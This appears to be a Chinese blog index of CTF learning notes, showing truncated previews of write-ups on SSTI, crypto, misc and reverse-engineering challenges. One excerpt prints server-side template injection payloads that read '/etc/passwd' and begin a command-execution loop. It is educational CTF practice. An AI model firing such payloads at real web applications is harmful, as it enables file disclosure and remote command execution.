「配枪朱丽叶。」

RootのCTF学习笔记。

python

BJDCTF2020/BUUCTF-WEB:Cookie is so stable(Twig模板注入)

ssti主要为python的一些框架jinja2 mako tornado django。 模板注入测试顺序--是时候祭出这张图了: 首先到/flag.php这页进行测试: Twig {{7*'7'}} 输出49 Jinja {{7*'7'}}输出7777777测试证明是Twig: 参考了这篇文章: www.k0rz3n.com因为提示cookie,经…

记一个好玩的模拟下载进度的python库。

Yaspin 下载: pip install --upgrade yaspin具体使用方法: GitHub - pavdmyt/yaspin: A lightweight terminal spinner for Python with safe pipes and redirects 🎁

RGB值转图片通用脚本ouo

#-*- coding:utf-8 -*- from PIL import Image import re def RGB2pic_main(): print('请先用因数分解(被分解数为RGB.txt行数),计算可能的尺寸x,y') x = int(input('x=')) #x坐标 通过对txt里的行数进行整数分解 y = int(input('y=')) #y坐标 x*y = 行数 im…

BUUCTF/HDCTF2019 - bbbbbbrsa

题目下载 给了两个文件。 第一个enc: p = 177077389675257695042507998165006460849 n = 37421829509887796274897162249367329400988647145613325367337968063341372726061 c = ==gMzYDNzIjMxUTNyIzNzIjMyYTM4MDM0gTMwEjNzgTM2UTN4cjNwIjN2QzM5ADMwIDNyMTO4…

BUUCTF-WEB shrine(SSTI)

import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/<path:shrine>') def shrine(shrine): def safe_jinja(s): s = s.replace('(', '').r</path:shrine>…

TokyoWesternsCTF-WEB:shrine

学习: 从 flask+jinjia2 认识 SSTI 服务端模板注入 | AbelChe's Blog Tokyo Westerns CTF 2018 WEB Wp | 码农网 题目里只给出了一个源代码: import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route(…

Web_python_template_injection(python模板注入)

[1] {{1+1}}测试,存在模板注入: [2] {{config.items()}} 可以查看服务器的配置信息: [3] 读取password信息: {{[].__class__.__base__.__subclasses__()[40]('/etc/passwd').read()}} [4] 命令执行,(ls列出文件): {% for c in [].__class__.__base__.…

Web_python_block_chain (浅学区块链双花攻击)

记笔记,对区块链不是很了解,还是萌萌qwq。 学习参考:区块链与51%算力攻击&2018-DDCTF-mini blockchain 51% (双花)攻击: 在比特币网络里,你有多少钱,不是你说了算,而是大家说了算,每个人都是公证人。”基于算力证明进行维护的比特币网络一直以来有一…

破译writeup(凯撒密码)

破译下面的密文: TW5650Y - 0TS UZ50S S0V LZW UZ50WKW 9505KL4G 1X WVMUSL510 S001M0UWV 910VSG S0 WFLW0K510 1X LZW54 WF5KL50Y 2S4L0W4KZ52 L1 50U14214SLW X5L0WKK S0V TSK7WLTS88 VWNW8129W0L 50 W8W9W0LS4G, 95VV8W S0V Z5YZ KUZ118K SU41KK UZ50S.LZ…

WEB-easytornado

题目描述:Tornado 框架 /flag.txt flag in /fllllllllllllag /welcome.txt render /hints.txt md5(cookie_secret+md5(filename))根据题目描述可知使用了tornoda框架,进去后根据提示信息render和需要cookie_secret猜测会存在注入,把签名随便改一下就会跳转…

HCTF 2018-admin(unicode 欺骗)

每天练练BUU,天天学到的新姿势.JPG 查看源码发现一行注释: 考虑到应该是登录以admin登录。先以test/test注册,登录康康,在/change这里发现题目给了一处源码: 不管是login、register还是change页面,只要是关于session['name']的操作, 都先用了strlower…

BUUCTF-Weird_List

题目下载 要写python脚本,把1换成“@”,把除了1的字符都替换成空格即可。别忘了每行后要有回车。 脚本如下: a=[[120],[120],[24, 1, 87, 1, 7],[7, 1, 15, 1, 21, 1, 16, 1, 49, 1, 7],[2, 1, 1, 1, 2, 1, 15, 1, 4, 1, 3, 1, 1, 1, 10, 1, 16, 1, 4, 1, 1,…

密码学-哈希还原

小明一直将电脑密码的Hash值写在标签纸上,结果一不小心墨水撒到了上面,只能看到前十位是c2979c7124,另外小明记得他的密码是4位的数字加字母,你能帮小明恢复密码的Hash值吗?(密码的Hash值即为Flag值) import string import re import hashlib import s…

jasec-算法逆向

function encode( $str = '' ){ $strrev = strrev( $str ); $string = ''; for( $i=0; $i $char = substr( $strrev, $i, 1 ); $ordChar = ord( $char ) + 1; $char = chr( $ordChar ); $string = $string.$char; } $string = base64_encode( $string ); $str…

PYC反编译

题目下载 用 https://tool.lu/pyc/进行反编译得到: from Crypto.Cipher import AES s = raw_input('input flag:') flag = '/\xce\xcc\x11\x8c\xb8\x8c\xcc\xfb\x0c\xb8\xb9\xab\xbb\xdf\x8f' c = AES.new('_th3_s3cr37_k3y_') if len(s) != 16: print 'fail…

2019西湖论剑预选赛 Misc - 最短的路/最短路径问题

#资深宅“flag{”在朋友邀请下,参加了一场聚会。 #在聚会上看到了美女“75D}”,一时心花荡漾、不能自己,坚信彼此就是天造地设的一双。 #想通过层层朋友的关系认识她,却无奈性格问题,不敢劳师动众。 #好在朋友帮忙搞到一张聚会人员关系图,如下:[('FloraPric…

WhaleCTF-德军密码(费纳姆密码)

二战时盟军截获德军一段密码,密文为:0000011000000000101010110111001011000101100000111001100100111100111001(密钥:helloworld),你可能会解出一个keyxxxxx的答案,请在y后面加{,结尾加},答案的格式是key{xxxxx},所以答案是?不难看出是费纳姆密码…

python tkinter可以使用的颜色

#coding:utf-8 from Tkinter import * colors = ''' #FFB6C1 LightPink 浅粉红 #FFC0CB Pink 粉红 #DC143C Crimson 深红/猩红 #FFF0F5 LavenderBlush 淡紫红 #DB7093 PaleVioletRed 弱紫罗兰红 #FF69B4 HotPink 热情的粉红 #FF1493 DeepPink 深粉红 #C71585 …

xctf-misc1

题目描述: (╯°□°)╯︵ ┻━┻ 50pt (╯°□°)╯︵ ┻━┻ d4e8e1f4a0f7e1f3a0e6e1f3f4a1a0d4e8e5a0e6ece1e7a0e9f3baa0c4c4c3d4c6fbb9e1b2e2e5e2b5b4e4b8b7e6e1e1b6b9e4b5e3b8b1b1e3e5b5b6b4b1b0e4e6b2fd很明显是十六进制,两个一组拆开进行ascii移位即可。 a = "d4e8…

BUUCTF-zip(CRC碰撞脚本、RAR文件尾)

题目下载这道题打开是68个加密的压缩文件,寻找规律发现每个压缩包里面的内容都是4个字节,首要考虑就是CRC爆破。 以下是菜狗我吭吃瘪肚写出来的脚本: import zipfile import string from binascii import crc32 stR = string.printable for i in range(0,6…

IceCTF:Crypto-Over the Hill writeup (希尔/hill密码)

题目描述: Over the hills and far away... many times I've gazed, many times been bitten. Many dreams come true and some have silver linings, I live for my dream of a decrypted flag. alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRS…

MONTGOMERY:Crypto-Hexahexacontadecimal Writeup

认识了python的一个新的库。首先pip install hexahexacontadecimal from hexahexacontadecimal import hhc, hhc_to_int print(hhc_to_int(‘BwS~lkh’)) #982378927243 print(hhc(982378927243)) #BwS~lkh